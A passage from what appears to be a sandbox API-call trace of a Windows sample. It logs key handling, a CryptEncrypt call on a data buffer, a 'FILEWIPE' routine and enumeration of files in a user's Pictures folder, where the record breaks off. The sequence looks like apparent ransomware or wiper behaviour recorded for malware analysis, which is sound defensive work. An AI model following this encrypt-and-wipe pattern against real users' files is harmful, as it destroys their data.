dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.821] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.821] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.821] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.821] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.822] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.822] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.822] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.823] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.823] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.824] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17d10, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17d20) returned 1 [0040.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.824] CharLowerBuffW (in: lpsz="byte[97569]", cchLength=0xb | out: lpsz="byte[97569]") returned 0xb [0040.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.826] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.828] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x964a38*, pdwDataLen=0x6ae220*=0x17d10, dwBufLen=0x17d20 | out: pbData=0x964a38*, pdwDataLen=0x6ae220*=0x17d20) returned 1 [0040.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.829] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.832] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.832] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.832] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.832] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.833] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.846] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.846] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.846] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.846] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.847] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.847] CryptDestroyKey (hKey=0x7c2200) returned 1 [0040.847] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.847] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.847] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.847] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.848] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.848] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.848] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.848] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.848] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.848] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.848] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.849] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.849] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.849] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.849] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.850] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.851] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.851] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.851] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, 